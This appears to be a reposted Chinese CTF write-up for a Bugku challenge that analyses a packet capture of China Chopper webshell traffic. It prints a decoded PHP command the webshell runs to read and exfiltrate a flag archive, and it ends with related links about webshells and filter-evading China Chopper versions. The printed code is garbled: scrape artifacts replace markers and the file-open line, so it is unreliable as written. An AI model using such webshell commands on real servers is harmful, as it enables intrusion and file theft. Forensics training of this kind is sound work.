Bugku 分析 中国菜刀

Posted fantasquex

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Bugku 分析 中国菜刀相关的知识,希望对你有一定的参考价值。

解压之后得到了一个流量包,只有不到10KB,美滋滋

先抓重点,过滤出http,只有6条数据记录,3条post,3条response,3条post都是一样的

随便打开一条pos

是一个assert断言,断言内容是一串base64加密的字符串(最后的%3D先解码为=)

得到了一串php代码

@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<‘5.3.0‘)
{
    @set_magic_quotes_runtime(0);
};
echo("[email protected]");
$F="C:\\wwwroot\\flag.tar.gz";
[email protected]($F,‘r‘);
if(@fgetc($fp))
{
    @fclose($fp);
    @readfile($F);
}
else
{
    echo(‘ERROR:// Can Not Read‘);
};
echo("[email protected]");
die();

就是说打印一个叫flag(等等flag?)的文件,并在前后打印[email protected]

快乐,只要找到flag.tar.gz就好了

最后一条response中就有这个文件

既然是一个文件中包含另一个文件,那就试一试binwalk

提取并解压,即可得到flag

 

以上是关于Bugku 分析 中国菜刀的主要内容,如果未能解决你的问题,请参考以下文章

Web Shell- 技术剖析中国菜刀 – Part I

[对抗训练]“中国菜刀”安装,20180222

如何配置php才能让中国菜刀使用

DAY1:webshell与中国菜刀

红色版中国菜刀(20141213)正式发布 过狗红色菜刀

中国菜刀连接一句话木马